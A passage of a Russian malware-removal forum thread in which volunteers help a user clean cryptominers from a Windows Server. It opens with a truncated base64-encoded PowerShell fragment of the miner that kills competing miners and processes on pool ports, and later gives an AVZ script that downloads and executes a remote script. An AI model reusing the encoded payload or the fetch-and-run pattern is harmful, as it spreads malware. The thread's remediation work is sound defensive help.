A0ACgAJAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAA0ACgAJAHsADQAKAAkACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoACQAJAHsADQAKAAkACQAJACQAbABpAG4AZQAgAD0AIAAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKAAkACQAJAGkAZgAgACgAJABsAGkAbgBlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQBpAGYAIAAoACgAJABwAHMAaQBkAHMAWwAwAF0AIAAtAGUAcQAgACQAbABpAG4AZQBbAC0AMQBdACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAMAAgACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANAAzACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAyADIAMgAyACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADYANgA2ADYAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADgAOAA4ACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADkAOQA5ADkAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA0ADUANQA2ADAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQApACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABlAHYAaQBkACAAPQAgACQAbABpAG4AZQBbAC0AMQBdAA0ACgAJAAkACQAJAGkAZgAgACgAKAAkAGUAdgBpAGQAIAAtAGUAcQAgACQAUABJAGQAKQAgAC0AbwByACAAKAAkAGUAdgBpAGQAIAAtAGUAcQAgACQAbQBQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABuAFAASQBkACkAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATQBpAG4AZQByACAAUABJAGQAOgAgACQAZQB2AGkAZAAiAA0ACgAJAAkACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ASQBkACAAJABlAHYAaQBkACAAfAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKAAkAewANAAoACQAJACQAbABpAG4AZQAgAD0AIAAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKAAkACQBpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ADQAKAAkACQBpAGYAIAAoACgAJABsAGkAbgBlAFsALQAzAF0AIAAtAG4AZQAgACQAbgB1AGwAbAApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEAMQAxADEAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAyADIAMgAyACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMwAzADMAMwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANAA0ADQAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA2ADYANgAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADgAOAA4ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOQA5ADkAOQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADMAMwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADQANQA1ADYAMAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADYANQAzADMAMwAiACkAIAAgACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUAMwAzADUAIgApACkAKQANAAoACQAJAHsADQAKAAkACQAJACQAZQB2AGkAZAAgAD0AIAAkAGwAaQBuAGUAWwAtADEAXQANAAoACQAJAAkAaQBmACAAKAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABtAFAASQBkACkAIAAtAG8AcgAgACgAJABlAHYAaQBkACAALQBlAHEAIAAkAG4AUABJAGQAKQApACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ADQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATQBpAG4AZQByACAAUABJAGQAOgAgACQAZQB2AGkAZAAiAA0ACgAJAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgACQAZQB2AGkAZAAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0ARgBvAHIAYwBlAA0ACgAJAAkAfQANAAoACQB9AA0ACgANAAoACQAkAE0AaQBuAGUAcgAgAD0AIAAiAFMAQwAiACwAIAAiAG0AcwBpAG4AZgBvACIALAAgACIAWABNAFIAKgAiACwAIgB4AG0AcgBpAGcAKgAiACwAIgBtAGkAbgBlAHIAZAAiACwAIgBNAGkAbgBlAHIARwBhAHQAZQAiACwAIgBDAGEAcgBiAG8AbgAiACwAIgB5AGEAbQBtADEAIgAsACIAdQBwAGcAZQBhAGQAZQAiACwAIgBhAHUAdABvAC0AdQBwAGcAZQBhAGQAZQAiACwAJwBzAHYAcwBoAG8AcwB0ACcALAAiAFMAeQBzAHQAZQBtAEkASQBTACIALAAiAFMAeQBzAHQAZQBtAEkASQBTAFMAZQBjACIALAAiAGEAdgBhAHMAdAAqACIALAAnAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAcgAqACcALAAiAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACoAIgAsACIAVwBpAG4AZABvAHcAcwBTAGUAcgB2AGkAYwBlACoAIgAsACIAdQBwAGQAYQB0AGUAIgAsACAAIgBjAGEAcgBzAHMAIgAsACIAcwBlAHIAdgBpAGMAZQAiACwAIgBjAHMAcgBzAGMAIgAsACIAYwBhAHIAYQAiACwAIgBqAGEAdgBhAHUAcABkACIALAAiAGcAeABkAHIAdgAiACwAIAAiAGwAcwBtAG8AcwBlAGUAIgAsACAAIgBzAGUAYwB1AGEAbQBzACIALAAiAFMAUQBMAEUAWABQAFIARQBTAFMAXwBYADYANABfADgANgAiACwAIAAiAEMAYQBsAGwAaQBnAHIAYQBwACIALAAiAFMAcQBsAGMAZQBxAHAAIgAsACIAUwBlAHQAdABpAG4AZwAiACwAIgBVAG4AaQBuAHMAdABhACIALAAgACIAVABlAHIAbQBzAC4ARQBYAEUAIgANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAG0AIABpAG4AIAAkAE0AaQBuAGUAcgApAA0ACgAJAHsADQAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAkAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQANAAoACQB9AA0ACgB9AA0ACgANAAoATQBhAGkAbgA=

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

[bayrak59]

Farbar Recovery Scan Tool
у меня ОС Windows Server 2008
там нет для серверных версии

[Vvvyg]

А пробовали запускать? Там разрядность важна.

[bayrak59]

1. Пофиксить не решился.
Предлагалось удалить как явно нужное так и мне не вполне ведомое
2. Отчеты Farbar Recovery Scan Tool прилагаю (не пойму только как это сделать).
3. Скрипт AVZ ничего не нашел

- - - - -Добавлено - - - - -

1. Пофиксить не решился.
Предлагалось удалить как явно нужное так и мне не вполне ведомое
2. Отчеты Farbar Recovery Scan Tool прилагаю (не пойму только как это сделать).
3. Скрипт AVZ ничего не нашел

Загрузил таки отчеты

[Vvvyg]

1. А почему? Там у Вас майнер через кодированный скрипт в PowerShell запускается. Фиксите и делайте новый лог Autologger.

[bayrak59]

1. А почему? Там у Вас майнер через кодированный скрипт в PowerShell запускается. Фиксите и делайте новый лог Autologger.

Сделал отчет.
Посмотрите, пожалуйста, что там нужно удалить.

[Vvvyg]

Ровно те же рекомендации, что и в сообщении #3.

[bayrak59]

Ровно те же рекомендации, что и в сообщении #3.

Извините мою непонятливость.
Я лишь слегка продвинутый пользователь.
Но HiJackThis Fork предлагает для удаления явно нужные вещи.
Видимо, нужно выбрать, но что?
Или пофиксить всё, что будет найдено?
В сообщении #3 не конкретизирован этот момент.

И ещё.
Не понял, что за код в сообщении #3?
Этот 25 - WMI Event: [PowerShell Event Log Consumer] PowerShell Event Log Filter - ...............
С ним что-то делать?

[Sandor]

bayrak59, в инструкциях как правило некоторые слова или фразы "кликабельны". То есть, нужно нажать и откроется подробная инструкция о том, как "пофиксить" или выполнить скрипт.

Сейчас Вам следует во время фикса в HiJackThis отметить только указанную одну строку.
На всякий случай вот ссылка: http://virusinfo.info/showthread.php?t=4491

Затем выполнить скрипт в AVZ и прикрепить файл avz_log.txt.
Еще ссылка: http://virusinfo.info/showthread.php?t=7239

После этого соберите с помощью Autologger еще раз новый CollectionLog (также, как делали в начале) и тоже прикрепите к следующему сообщению.

[bayrak59]

bayrak59, в инструкциях как правило некоторые слова или фразы "кликабельны". То есть, нужно нажать и откроется подробная инструкция о том, как "пофиксить" или выполнить скрипт.

Сейчас Вам следует во время фикса в HiJackThis отметить только указанную одну строку.
На всякий случай вот ссылка: http://virusinfo.info/showthread.php?t=4491

Затем выполнить скрипт в AVZ и прикрепить файл avz_log.txt.
Еще ссылка: http://virusinfo.info/showthread.php?t=7239

После этого соберите с помощью Autologger еще раз новый CollectionLog (также, как делали в начале) и тоже прикрепите к следующему сообщению.

1. Пофиксил
2. Скрипт AVZ уязвимостей не выявил.
3. Отчеты прикрепил

[Sandor]

новый CollectionLog (также, как делали вначале) и тоже прикрепите к следующему сообщению.

не сделали.

[Vvvyg]

Такими темпами мы не вылечим ваш сервер никогда. Там уже новый майнер, в папке C:\webmfc. И в папке временных файлов 10050 вирусов.
Надо доступ к серверу ограничивать, нужен админ, который этим займётся, а не продвинутый пользователь, который неделю почти не мог фикс в HijackThis сделать... Удалять вирусы бесполезно, их тут же новых напихают.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

() C:\webmfc\www\superminer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
Startup: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SuperAbsenteeism.lnk [2018-06-06]
ShortcutTarget: SuperAbsenteeism.lnk -> C:\webmfc\www\superminer.exe ()
HKU\S-1-5-21-4012351981-3803896577-523002748-500\...\Run: [SuperMiner] => C:\webmfc\www\SUPERM~1.EXE [1863680 2018-06-05] ()
C:\webmfc
FirewallRules: [{A28135AB-B1E4-4B37-89B3-836F6F9893A1}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{C77783B7-673F-4B76-AE91-9505F9C4BC61}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{FA3EF290-B73E-4FFB-8999-E911326B9110}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{48927487-A033-42A2-819A-6C9B95C39DFF}] => (Allow) C:\Windows\Temp\lsass.eXe
EmptyTemp:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Затем сделайте новый лог Autologger.

[bayrak59]

не сделали.

Добавил.

[Vvvyg]

Если фикс в FRST делали - прикрепите файл Fixlog.txt.

Пофиксите в HijackThis:

Код:

O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperAbsenteeism.lnk [backup] => C:\webmfc\www\superminer.exe (2018/06/06)
O4 - MSConfig\startupreg: Open Server [command] = (no file) (2018/06/06)
O4 - MSConfig\startupreg: SuperMiner [command] = C:\webmfc\www\superminer.exe (HKCU) (2018/06/06)

Что с проблемами?

[bayrak59]

Если фикс в FRST делали - прикрепите файл Fixlog.txt.

Пофиксите в HijackThis:

Код:

O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperAbsenteeism.lnk [backup] => C:\webmfc\www\superminer.exe (2018/06/06)
O4 - MSConfig\startupreg: Open Server [command] = (no file) (2018/06/06)
O4 - MSConfig\startupreg: SuperMiner [command] = C:\webmfc\www\superminer.exe (HKCU) (2018/06/06)

Что с проблемами?

Пофиксил.
После этого сделал FRST.txt
Прикрепил.

То, с чего началась эта тема ( lsass.eXe ), второй день не появляется.
Но и раньше бывало затишье. Почему-то вначале он лез стабильно по выходным.
Надо понаблюдать.
Зато нарисовалось еще такое : exp1orer.exe

[Vvvyg]

Мы опять-таки боремся не с причинами, а с последствиями...

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

FirewallRules: [{A28135AB-B1E4-4B37-89B3-836F6F9893A1}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{C77783B7-673F-4B76-AE91-9505F9C4BC61}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{FA3EF290-B73E-4FFB-8999-E911326B9110}] => (Allow) C:\Windows\Temp\lsass.eXe
FirewallRules: [{48927487-A033-42A2-819A-6C9B95C39DFF}] => (Allow) C:\Windows\Temp\lsass.eXe
CMD: wmic qfe list
CMD: ipconfig /all
CMD: tracert -h 4 ya.ru

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Посмотрите, Symantec Endpoint Protection в каком состоянии, включён, обновлён?

Смените пароль учётной записи Администратор на сложный. Пользователи на сервер заходят как, все под админской учёткой?

[bayrak59]

Что-то мой ответ пропал.
Повторю.

1. Сделал.
Файл прикрепил.

2. Symantec обновлен, включен.
Посторонними силами не отключался.

3. Пароль длинный, но простоват.
Сменил.

4. Пользователь - я один.
Захожу под админской учеткой

[Vvvyg]

Попробуйте установит этот хотфикс KB4012212.

Сделайте лог сканирования МВАМ.